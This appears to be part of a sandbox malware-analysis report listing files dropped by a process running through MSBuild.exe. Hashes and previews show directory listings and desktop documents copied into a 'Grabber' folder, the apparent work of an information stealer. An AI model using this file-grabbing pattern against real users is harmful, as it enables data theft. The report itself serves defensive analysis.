SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Startup.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Temp.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4258
Entropy (8bit):	5.180518522928062
Encrypted:	false
SSDEEP:	96:4+zWAVKdmRYatkllchZ+0js5jQDuL3qGVbzgvgGjliKDx2:VGmHjh9A5Qi7qKYd2
MD5:	C089CBAC061D0B794BDE703B21CB2020
SHA1:	1D02CDA40B6F0D12AFA53A5A60BF9B2EABCE0B6A
SHA-256:	45CFF6C1E463FAB8AC83E00C16B470CDDC8E24532937C200F32EB36089B630DC
SHA-512:	4AD21A32929D8D40DF10F95DD6D884B1C57D5F806AD44550D2AE51BFFC0CBC33FCF18C2FDB01062A9AC2508E0C69B2557BF0CA23E5FD823C3D922D1D81E78F7F
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 10-35-12-702.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 10-35-28-062.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696494585269698100_E17B0719-D02C-4335-AB6C-281B4DF4FA32.log.....App1696494605856829900_AEC4E5DC-8793-4593-BF70-D6C0B1029057.log.....App1696494619329667800_C49F9097-5715-49AD-A710-41656A5432E3.log.....App1696494619330229500_C49F9097-5715-49AD-A710-41656A5432E3.log...edge_BITS_376_13732259\....5686322a-ffa9-43cd-98c7-9900dceae2d0...edge_BITS_376_1379031757\....2e8a592b-0ad4-414c-b996-21bd8749e2fd...edge_BITS_376_1393200989\....c78f9967-7a8c-44b0-ad94-732b63c89638...edge_BITS_376_1447122356\....ef5f792e-9df7-4748-accf-02ec33a4a2c4...edge_BITS_376_1490480016\....c50698d5-282c-4c8d-9fa6-c155f2d8d379...edge_BITS

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Videos.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\BJZFPPWAPT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\EEGWXUHVUG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
